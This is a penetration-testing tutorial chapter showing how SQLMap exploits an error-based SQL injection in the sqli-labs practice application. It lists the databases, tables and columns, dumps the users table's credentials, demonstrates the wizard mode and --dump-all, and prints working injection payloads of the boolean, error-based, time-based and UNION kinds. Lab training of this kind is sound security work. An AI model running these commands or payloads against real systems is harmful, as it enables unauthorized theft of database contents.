Dumping The Data (in a error-based scenario) via SQLMap

If you have learned the previous chapter then you might have a basic understanding of SQLMap usage. 

  • Learn More: 

Detect and Exploit SQL Injection Using SQLMap

This tutorial demonstrates how to detect and exploit SQL injection vulnerabilities using SQLMap, a powerful open-source penetration testing tool. It provides step-by-step instructions on installing and using SQLMap to identify and exploit SQL injection vulnerabilities in web applications.


In this chapter, we are going to dump data in an Error-based Scenario.  


Let's go back to the previously discussed example. Here, we shall exploit the vulnerability using the error-based technique of SQLMap to list the database user and the list of databases.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 --current-user

The output is shown below:

[12:36:26] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: PHP 5.6.39, Apache 2.4.37
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
[12:36:26] [INFO] fetching current user
current user: 'root@localhost'
[12:36:26] [INFO] fetched data logged to text files under '/home/kali/.local/share/sqlmap/output/192.168.56.108'

Impressive! The current database user pointed out by SQLMap is root.

Now let us print the list of databases present using --dbs switch.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 --dbs 

The output is shown below:

available databases [7]:                                                                                                      
[*] challenges
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] security
[*] test

We have now found seven databases, of which five are the default for MySQL— "challenges", “information_schema”, “mysql”, “performance_schema”, and "phpmyadmin" and two that the user created— “security” and “test”.

Once we have the list of databases available, it may be a good idea to dump one of them. 

For demonstration, I'll select the security, and dump out the tables present inside it. SQLMap provides the --tables switch to list the same, but it must be used in parallel with the -D switch, which tells it which database to choose while dumping the tables.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 -D security --tables

The output is shown below:

Database: security                                                                                                            
[4 tables]
+----------+
| emails   |
| referers |
| uagents  |
| users    |
+----------+

The --tables instruct the sqlmap to extract all the tables from the security database. We’ve managed to find four tables in the security database. 

Next, we would try to enumerate the columns in the table that we are interested in. Now that the tables are at our disposal, let us dump out the data from the users' table. We'll use the --dump switch in conjunction with -D, and -T, which are used to dump out the data from the database and table names respectively.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 -D security -T users --dump

The output is shown below:

Database: security                                                                                                            
Table: users
[13 entries]
+----+------------+----------+
| id | password   | username |
+----+------------+----------+
| 1  | Dumb       | Dumb     |
| 2  | I-kill-you | Angelina |
| 3  | p@ssword   | Dummy    |
| 4  | crappy     | secure   |
| 5  | stupidity  | stupid   |
| 6  | genious    | superman |
| 7  | mob!le     | batman   |
| 8  | admin      | admin    |
| 9  | admin1     | admin1   |
| 10 | admin2     | admin2   |
| 11 | admin3     | admin3   |
| 12 | dumbo      | dhakkan  |
| 14 | admin4     | admin4   |
+----+------------+----------+

Look at that, we have successfully extracted the data from the table. Sometimes it is possible that we are just interested in a specific column and not all of them.

For example, in the previous image, we may want to extract only the username and password columns, and might not want to waste time dumping the id column. 

To select and dump from specific columns we can use the -C switch, but initially, we'll use --columns to print the column names without actually dumping the table, and then use -C to select specific column names.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 -D security -T users --columns

The output is shown below:

Database: security                                                                                                            
Table: users
[3 columns]
+----------+-------------+
| Column   | Type        |
+----------+-------------+
| id       | int(3)      |
| password | varchar(20) |
| username | varchar(20) |
+----------+-------------+

Great! We've got the exact column structure, now let us select the username and password columns, and dump from only these two columns.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 -D security -T users -C "username,password" --dump

The output is shown below:

Database: security                                                                                                            
Table: users
[13 entries]
+----------+------------+
| username | password   |
+----------+------------+
| Dumb     | Dumb       |
| Angelina | I-kill-you |
| Dummy    | p@ssword   |
| secure   | crappy     |
| stupid   | stupidity  |
| superman | genious    |
| batman   | mob!le     |
| admin    | admin      |
| admin1   | admin1     |
| admin2   | admin2     |
| admin3   | admin3     |
| dhakkan  | dumbo      |
| admin4   | admin4     |
+----------+------------+

There we have it! This data output is from only the username and password columns. As you can see from the syntax, the -C option takes the comma-separated values (CSV) of the column names.


Interacting with the wizard

If the previous stuff looks complicated then, for basic familiarity, there is an interactive setup wizard where SQLMap asks for things in detail, one by one, starting with the injection URL.

The --wizard switch invokes the wizard. 

┌──(kali㉿kali)-[~]
└─$ sqlmap --wizard                                                                                                 
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.6.7#stable}
|_ -| . [,]     | .'| . |
|___|_  [,]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting @ 12:46:02 /2022-12-06/

[12:46:02] [INFO] starting wizard interface
Please enter full target URL (-u):

As you can see, the wizard then asks for information. Input as per requirement.

Please enter full target URL (-u): http://192.168.56.108/sqli-labs-master/Less-1/?id=4
POST data (--data) [Enter for None]: 
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Intermediate
[3] All
> 1

sqlmap is running, please wait..

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=4' AND 5978=5978 AND 'yBkh'='yBkh

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=4' AND (SELECT 7029 FROM(SELECT COUNT(*),CONCAT(0x71766b7871,(SELECT (ELT(7029=7029,1))),0x71716a6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'pqQq'='pqQq

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=4' AND (SELECT 2736 FROM (SELECT(SLEEP(5)))haHG) AND 'MBbF'='MBbF

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: id=-6733' UNION ALL SELECT NULL,NULL,CONCAT(0x71766b7871,0x6e7a796f655346646f704c4c6167654b6c666177674254694d6456497a5851767371434e5467736a,0x71716a6a71)-- -
---
web server operating system: Windows
web application technology: PHP 5.6.39, Apache 2.4.37
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
banner: '10.1.37-MariaDB'
current user: 'root@localhost'
current database: 'security'
current user is DBA: True

[*] ending @ 12:46:34 /2022-12-06/

It produces a basic output based on the setting chosen, such as the current user, the current database which was injectable, and whether or not the current user is a database administrator (DBA).


Dump everything!

There is an SQLMap option named --dump-all which dumps all the data present inside every single database accessible through the injection, including default databases such as information schema.

┌──(kali㉿kali)-[~]
└─$ sqlmap -u http://192.168.56.108/sqli-labs-master/Less-1/?id=4 --dump-all

This command will extract everything accessible through the injection. Dumping all the databases takes a long time, and is generally not recommended. It may even disrupt the web application if the server resources are constrained.

Tags

You may like these posts

Show more

Post a Comment

0 Comments
* Please Don't Spam Here. All the Comments are Reviewed by Admin.

If you have any doubts or any queries you can specify here.

#buttons=(Ok, Go it!) #days=(20)

Our website uses cookies to enhance your experience. Learn More
Ok, Go it!